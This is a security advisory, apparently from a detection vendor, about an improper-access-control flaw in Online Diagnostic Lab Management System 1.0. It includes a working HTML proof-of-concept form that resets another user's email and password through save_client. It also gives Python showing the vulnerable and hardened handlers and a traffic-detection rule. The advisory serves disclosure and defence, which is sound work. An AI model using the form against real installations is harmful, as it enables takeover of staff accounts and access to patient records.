Online Diagnostic Lab Management System 1.0 - Account Takeover



Application Details

Online Diagnostic Lab Management System (ODLMS) is a web-based application that diagnostic labs use to manage patient laboratory tests. Patients can book appointments through it, and the lab uses it to manage all appointments and patient test results.


Vulnerability

Online Diagnostic Lab Management System 1.0 could allow a remote attacker to bypass security restrictions because of improper access control. The save_client action of classes/Users.php writes the submitted account data, including a new password, to whichever user record the 'id' parameter names, without verifying that the requester is authenticated as, or authorised to edit, that user.


Identification

By sending a specially crafted POST request to classes/Users.php?f=save_client that sets the 'id', 'email', 'password' and 'cpass' parameters, an attacker could exploit this vulnerability to take over any registered staff user account. The proof-of-concept form below submits such a request for the account with id 2 and sets its e-mail address and password to attacker-chosen values; the remaining fields are profile data the endpoint expects. The form can be hosted on any page, or the same request can be sent directly with any HTTP client.


<html>
<body>
<form action="http://localhost/odlms/classes/Users.php?f=save_client" method="post" enctype="multipart/form-data">
<input type="hidden" name="id" value="2" />
<input type="hidden" name="firstname" value="Claire" />
<input type="hidden" name="middlename" value="C" />
<input type="hidden" name="lastname" value="Blake" />
<input type="hidden" name="gender" value="Female" />
<input type="hidden" name="dob" value="1997-10-14" />
<input type="hidden" name="contact" value="09456789123" />
<input type="hidden" name="address" value="Sample Address only" />
<input type="hidden" name="email" value="test@test.com" />
<input type="hidden" name="password" value="test@1234" />
<input type="hidden" name="cpass" value="test@1234" />
<input value="Submit" type="Submit">
</form>
</body>
</html>
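To show why the request above succeeds, here is an added illustration written for this advisory, not ODLMS's own Users.php code: the in-memory user table, the session dictionary and the function names are assumed. The vulnerable handler applies the update to whatever 'id' the form names; the hardened one binds the update to the authenticated session and requires the current password before changing it. The attack form values are the ones from the PoC above.

```python
"""Vulnerable vs. hardened save_client logic (added illustration, not ODLMS code).

Assumptions: an in-memory user table keyed by id, a session dict holding
'user_id' for a logged-in user, and salted PBKDF2 password storage.
"""
import hashlib
import hmac
import secrets


def hash_password(password: str, salt: bytes = None) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the 16-byte salt is stored in front of the digest."""
    salt = salt or secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def verify_password(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)


def fresh_users() -> dict:
    """Constructed sample table: id 1 is Alice, id 2 is the account the PoC targets."""
    return {
        1: {"email": "alice@example.test", "password": hash_password("alice-secret")},
        2: {"email": "claire@example.test", "password": hash_password("claire-secret")},
    }


# The PoC form fields that matter for the takeover (values taken from the page).
ATTACK_FORM = {"id": "2", "email": "test@test.com", "password": "test@1234", "cpass": "test@1234"}


def save_client_vulnerable(session: dict, form: dict, users: dict) -> str:
    """The pattern behind the advisory: 'id' comes from the request and nobody
    checks that the caller is logged in, let alone that it owns that record."""
    uid = int(form["id"])
    if uid not in users:
        return "no such user"
    if form["password"] != form["cpass"]:
        return "password mismatch"
    users[uid]["email"] = form["email"]
    users[uid]["password"] = hash_password(form["password"])
    return "saved"


def save_client_hardened(session: dict, form: dict, users: dict) -> str:
    """The subject of the update is the session user. A client-supplied 'id'
    that disagrees is rejected, and a password change needs the current one.
    (An admin path that edits other accounts would need an explicit role check,
    not a trusted 'id'.)"""
    uid = session.get("user_id")
    if uid is None:
        return "authentication required"
    if "id" in form and str(form["id"]) != str(uid):
        return "forbidden"
    new_password = form.get("password", "")
    if new_password:
        if new_password != form.get("cpass"):
            return "password mismatch"
        if not verify_password(form.get("current_password", ""), users[uid]["password"]):
            return "current password incorrect"
        users[uid]["password"] = hash_password(new_password)
    users[uid]["email"] = form["email"]
    return "saved"


if __name__ == "__main__":
    users = fresh_users()
    print("vulnerable:", save_client_vulnerable({}, ATTACK_FORM, users),
          "| victim now has password test@1234:", verify_password("test@1234", users[2]["password"]))
    users = fresh_users()
    print("hardened, no session:", save_client_hardened({}, ATTACK_FORM, users))
    print("hardened, user 1 targeting id 2:", save_client_hardened({"user_id": 1}, ATTACK_FORM, users))
```

Run as a script, the vulnerable handler accepts the unauthenticated request and the victim's password becomes test@1234; the hardened handler refuses it without a session and refuses a logged-in user who names someone else's id.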

Detection

By turning this request into a traffic file and a matching rule, we are able to detect attempts to bypass security restrictions by influencing the vulnerable parameters: a POST to classes/Users.php with f=save_client whose body carries 'id' together with 'password' and 'cpass'. A legitimate profile update by a logged-in user produces the same request shape, so a match should be reviewed against the session state; a sender with no session, or an 'id' other than the sender's own account, indicates exploitation.
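The following detection logic is an added example for this advisory; it is not Idappcom's traffic file or signatures 8022351/8022352, and not ODLMS code. It assumes the request shape of the PoC form (a POST to /classes/Users.php?f=save_client with a multipart body carrying id, email, password and cpass) and that a logged-in ODLMS user presents a PHPSESSID cookie; the sample requests it inspects are constructed, not captured traffic.

```python
"""Match the ODLMS save_client takeover request in raw HTTP (added example).

Assumes the PoC request shape and a PHPSESSID cookie for logged-in users;
samples below are constructed, not captured.
"""
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/classes/Users.php"
TARGET_ACTION = "save_client"
TAKEOVER_FIELDS = {"id", "password", "cpass"}


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data parser returning {field name: value}."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return {}
    delimiter = b"--" + match.group(1).encode("latin-1")
    fields = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):            # "--boundary--" ends the body
            break
        chunk = chunk.removeprefix(b"\r\n").removesuffix(b"\r\n")
        part_head, _, part_body = chunk.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = part_body.decode("utf-8", "replace")
    return fields


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, form fields)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    form = parse_multipart(ctype, body) if ctype.startswith("multipart/form-data") else {}
    return method, target, headers, form


def inspect(raw: bytes):
    """Return an alert dict if the request matches the takeover pattern, else None."""
    method, target, headers, form = parse_request(raw)
    url = urlsplit(target)
    if method != "POST" or not url.path.endswith(TARGET_PATH):
        return None
    if parse_qs(url.query).get("f", [""])[0] != TARGET_ACTION:
        return None
    if not TAKEOVER_FIELDS.issubset(form):
        return None
    # The packet alone cannot prove the sender does not own account 'id'.
    # No PHP session cookie means an unauthenticated sender, exactly the PoC: high.
    # With a session the 'id' is still attacker-chosen, so keep it for review.
    authenticated = "phpsessid=" in headers.get("cookie", "").lower()
    return {"rule": "odlms-save_client-account-takeover", "target_id": form["id"],
            "new_email": form.get("email", ""),
            "severity": "medium" if authenticated else "high"}


BOUNDARY = "----odlmsPoCboundary"


def multipart_body(fields: dict, boundary: str = BOUNDARY) -> bytes:
    """Encode fields the way a browser submits the PoC form (constructed)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()


def http_post(path: str, body: bytes, cookie: str = "") -> bytes:
    """Assemble a raw HTTP/1.1 POST (constructed sample, not captured traffic)."""
    head = [f"POST {path} HTTP/1.1", "Host: localhost",
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}",
            f"Content-Length: {len(body)}"] + ([f"Cookie: {cookie}"] if cookie else [])
    return ("\r\n".join(head) + "\r\n\r\n").encode() + body


POC_FIELDS = {"id": "2", "firstname": "Claire", "lastname": "Blake",
              "email": "test@test.com", "password": "test@1234", "cpass": "test@1234"}
# 1) the PoC as a browser would send it, no session cookie: attacker-style request
ATTACK_REQUEST = http_post("/odlms/classes/Users.php?f=save_client", multipart_body(POC_FIELDS))
# 2) an ordinary login to the same script: different action, no id/cpass
LOGIN_REQUEST = http_post("/odlms/classes/Users.php?f=login",
                          multipart_body({"email": "test@test.com", "password": "test@1234"}))
# 3) the same update sent from a logged-in session: still flagged, lower severity
SESSION_UPDATE = http_post("/odlms/classes/Users.php?f=save_client",
                           multipart_body(POC_FIELDS), cookie="PHPSESSID=0123456789abcdef")

if __name__ == "__main__":
    for raw in (ATTACK_REQUEST, LOGIN_REQUEST, SESSION_UPDATE):
        print(inspect(raw))
```

The rule keys on the script path, the f=save_client action and the presence of 'id' alongside 'password' and 'cpass', which is what distinguishes the takeover request from a login to the same script. Severity is only a hint: the cookie check separates the unauthenticated PoC from a session-bearing request, but whether a logged-in sender is editing its own record can only be settled server-side.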


Coverage

Idappcom has created signatures 8022351 and 8022352 along with corresponding traffic files.


References

ODLMS 1.0 - Account Takeover - Exploit Database

ODLMS 1.0 Missing Access Control - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can test your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional